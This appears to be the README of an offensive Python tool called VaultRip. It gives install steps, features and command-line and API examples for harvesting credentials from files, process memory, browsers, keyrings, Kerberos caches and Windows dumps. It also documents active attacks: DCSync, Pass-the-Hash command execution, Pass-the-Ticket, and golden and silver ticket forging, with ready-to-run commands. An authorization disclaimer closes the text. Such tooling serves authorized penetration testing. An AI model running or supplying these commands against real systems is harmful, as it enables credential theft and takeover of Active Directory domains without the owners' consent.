Post-exploitation credential harvesting and active attack engine — six sweep modules across files, process memory, browsers, system keyrings, Kerberos ticket caches, and offline dumps, plus five active attack modules (DCSync, Pass-the-Hash, Pass-the-Ticket, golden ticket, silver ticket) hidden behind explicit opt-in flags. Pure Python.
# Kali / Debian / Ubuntu — venv required on externally-managed Python
python3 -m venv .venv && source .venv/bin/activate
pip install vaultrip
pip install vaultrip[impacket] # + offline LSASS / SAM / NTDS.dit parsing
pip install vaultrip[attack] # + active attack modules (DCSync, PTH, ticket forging)
pip install vaultrip[ssh]Or from source:
git clone https://github.com/CommonHuman-Lab/vaultrip.git
cd vaultrip
python3 -m venv .venv && source .venv/bin/activate
pip install -e .Run it once. Get credentials from six surfaces.
Post-exploitation tooling on Linux is fragmented — run find for credential files, grep process memory manually, use a separate tool for Kerberos, another for browser stores, another for LSASS dumps. VaultRip replaces the entire chain.
One command, six surfaces. A single vaultrip ~ sweeps the filesystem for 55 known credential paths across 26 services, scans process memory via /proc/*/mem, reads browser credential databases, queries system keyrings, extracts Kerberos tickets from every ccache it finds, and optionally parses an offline dump — all in one pass, structured JSON out.
Full feature set on Linux, core modules everywhere. Process memory scanning (/proc/*/mem) and system keyrings (GNOME, kwallet) require Linux. File sweep, browser credentials, dump analysis, and SSH remote harvesting run on Linux, macOS, and WSL — anywhere Python 3.10 runs.
Offline dump analysis without a live target. LSASS minidumps, SAM hives, and NTDS.dit are parsed via pypykatz and impacket — NT hashes, LM hashes, and plaintext credentials extracted from a file, on any OS, with no access to the original machine required.
Process memory without ptrace. The memory module reads /proc/<pid>/maps and /proc/<pid>/mem directly — no ptrace, no debugging API, no process suspension. 34 credential patterns scan heap and anonymous regions of agents, browsers, and SSH sessions for material sitting in cleartext.
Binary ccache and keytab parsing — no impacket required. Kerberos ticket extraction uses a custom binary parser for MIT ccache v3/v4 and keytab v2 formats. Every ticket cache on the system is located (KRB5CCNAME, /tmp/krb5cc_*, /var/lib/sss/db/) and parsed without any external Kerberos dependency. Impacket only enters the picture for offline Windows dump analysis.
Offline dump analysis built in. Drop an LSASS minidump, SAM hive, or NTDS.dit — VaultRip identifies the format by magic bytes and dispatches to pypykatz (LSASS) or impacket (SAM/NTDS) to extract NT hashes, LM hashes, and plaintext credentials where available.
SSH remote harvesting. --remote HOST connects via the built-in SSH client, runs a battery of harvesting commands on the remote host, and parses output locally — no files dropped on the target.
Active attack modules — opt-in only. DCSync replicates an entire Active Directory credential database via DRSUAPI without touching disk. Pass-the-Hash executes arbitrary commands on Windows hosts using only an NT hash. Pass-the-Ticket injects a ccache into the current session via KRB5CCNAME. Golden and silver ticket forging constructs fully signed Kerberos tickets from a hash — no DC required for forging. All five modules are disabled by default and require explicit flags.
| Module | What it sweeps | Notes |
|---|---|---|
| Files | ~/.ssh, ~/.aws, ~/.kube, .env, git-credentials, Docker config, cloud tokens |
55 credential paths × 26 services; 34 regex patterns |
| Memory | /proc/*/mem — heap and anonymous regions of running processes |
No ptrace; reads mapped regions directly |
| Browser | Chrome, Chromium, Edge, Brave, Firefox | SQLite Login Data; Firefox NSS decryption via libnss3 |
| System | GNOME keyring, kwallet, git-credentials, Docker, .pgpass, .netrc, .my.cnf |
|
| Kerberos | ccache files, keytab files, KRB5CCNAME env var |
Custom binary parser — no external dependency |
| Dumps | LSASS minidump, SAM hive + SYSTEM hive, NTDS.dit | pypykatz + impacket (optional extra) |
| DCSync ⚠ | Replicate all AD credentials via DRSUAPI | Requires --dcsync + vaultrip[attack] |
| Pass-the-Hash ⚠ | Execute commands on Windows via NT hash | Requires --pth + vaultrip[attack] |
| Pass-the-Ticket ⚠ | Inject a ccache into the current session | Requires --ptt |
| Ticket Forge ⚠ | Golden / silver Kerberos ticket construction | Requires --forge-golden / --forge-silver + vaultrip[attack] |
# Sweep current user's home — all modules
vaultrip ~
# Files and browser only — fast, no memory or system keyring scan
vaultrip ~ --no-memory --no-system --no-kerberos
# Restrict memory scan to a single PID
vaultrip ~ --pid 1234
# Target a specific user (requires appropriate permissions)
vaultrip ~ --user www-data
# Full verbose output — show extracted credential values
vaultrip ~ -v
# Write findings to JSON
vaultrip ~ -o /tmp/findings.json
# Analyse an offline LSASS minidump (requires vaultrip[impacket])
vaultrip --dumps /tmp/lsass.dmp
# Analyse a SAM hive (SYSTEM hive must be in the same directory)
vaultrip --dumps /tmp/SAM
# Remote sweep via SSH key
vaultrip --remote 192.168.1.10 --ssh-user root --ssh-key ~/.ssh/id_rsa
# Remote sweep via password
vaultrip --remote 10.10.10.5 --ssh-user root --ssh-pass s3cr3t
# ⚠ DCSync — replicate all AD credentials from a DC
vaultrip --dcsync --dc 192.168.1.1 --domain corp.local \
--attack-user Administrator --attack-hash <NT_HASH>
# ⚠ Pass-the-Hash — run whoami on a remote Windows host
vaultrip --pth --dc 192.168.1.50 --domain corp.local \
--attack-user Administrator --attack-hash <NT_HASH>
# ⚠ Forge a golden ticket and inject it into the current session
vaultrip --forge-golden --ptt \
--domain corp.local --domain-sid S-1-5-21-... \
--krbtgt-hash <NT_HASH> --attack-user Administrator
# ⚠ Forge a silver ticket for a specific SPN
vaultrip --forge-silver --forge-silver-spn cifs/server.corp.local \
--domain corp.local --domain-sid S-1-5-21-... \
--attack-hash <SERVICE_NT_HASH> --attack-user AdministratorRun with no arguments for interactive wizard mode (passive modules only).
from vaultrip import scan, ScanOptions
result = scan("~", options=ScanOptions(memory=False, browser=False))
print(f"{result.total_findings} credential(s) in {result.duration_s:.1f}s")
for f in result.files:
print(f" [{f.service}] {f.credential_type} — {f.path}")
for f in result.kerberos:
print(f" [kerberos] {f.principal} → {f.service} expires={f.expires}")
for f in result.dumps:
nt = f"NT={f.nt_hash}" if f.nt_hash else ""
print(f" [{f.dump_type}] {f.domain or ''}/{f.username} {nt}")
# Attack modules — explicit opt-in
from vaultrip import scan, ScanOptions
result = scan("~", options=ScanOptions(
dcsync=True,
dc_host="192.168.1.1",
ad_domain="corp.local",
attack_user="Administrator",
attack_hash="<NT_HASH>",
))
for f in result.dcsync:
print(f" {f.domain}\\{f.username} NT={f.nt_hash}")| Option | Default | Description |
|---|---|---|
target |
~ |
Directory to sweep (positional) |
--no-local |
off | Skip filesystem sweep |
--no-memory |
off | Skip process memory scan |
--no-browser |
off | Skip browser credential stores |
--no-system |
off | Skip system keyrings |
--no-kerberos |
off | Skip Kerberos ticket extraction |
--dumps PATH |
— | Parse offline dump: LSASS minidump / SAM hive / NTDS.dit |
--user USER |
current | Restrict sweep to a specific Unix user's home |
--pid PID |
all | Restrict memory scan to a single process |
--remote HOST |
— | SSH target for remote harvesting |
--ssh-user USER |
— | SSH username |
--ssh-key PATH |
— | SSH private key path |
--ssh-pass PASS |
— | SSH password (prefer --ssh-key) |
--ssh-port PORT |
22 |
SSH port |
-o FILE |
— | Write findings as JSON |
-v |
off | Verbose — show extracted credential values |
--timeout SEC |
30 |
Per-operation timeout |
Attack flags — all disabled by default, all require vaultrip[attack] unless noted:
| Option | Description |
|---|---|
--dcsync |
DCSync via DRSUAPI — replicate AD credentials |
--pth |
Pass-the-Hash — execute --attack-cmd on --dc host |
--ptt |
Pass-the-Ticket — inject --ptt-ticket ccache/kirbi (no extra required) |
--forge-golden |
Forge a Kerberos golden ticket (TGT) |
--forge-silver |
Forge a silver ticket for --forge-silver-spn |
--dc HOST |
Domain Controller address |
--domain DOMAIN |
Active Directory domain name |
--domain-sid SID |
Domain SID S-1-5-21-... (ticket forging) |
--krbtgt-hash HASH |
krbtgt NT hash (golden ticket) |
--attack-user USER |
Username to impersonate |
--attack-hash HASH |
NT hash for PTH / DCSync / silver ticket |
--attack-cmd CMD |
Command to run after PTH (default: whoami) |
--ptt-ticket PATH |
Path to .ccache or .kirbi to inject |
--forge-silver-spn SPN |
SPN for silver ticket, e.g. cifs/host.domain.local |
git clone https://github.com/CommonHuman-Lab/vaultrip.git
cd vaultrip
python3 -m venv .venv && source .venv/bin/activate
pip install -e .
pip install -e ".[dev]" # + pytest, mypy, ruff
pip install -e ".[impacket]" # + LSASS / SAM / NTDS parsing
pip install -e ".[attack]" # + DCSync / PTH / ticket forging
pip install -e ".[ssh]"Requires Python 3.10+. On Kali and other Debian-based systems, the virtual env is required — system Python is externally managed.
Only run VaultRip against systems you own or have explicit written authorization to test. Authorized use includes penetration testing engagements, red team operations, CTF competitions, and internal security assessments.
The active attack modules — DCSync, Pass-the-Hash, and ticket forging — are disabled by default. Enable them only within a clearly scoped and authorized engagement.
The authors accept no liability for unauthorized or illegal use.
Licensed under the AGPLv3. You are free to use, modify, and distribute this software. If you run it as a service or distribute it, the source must remain open.
For commercial licensing, contact the author.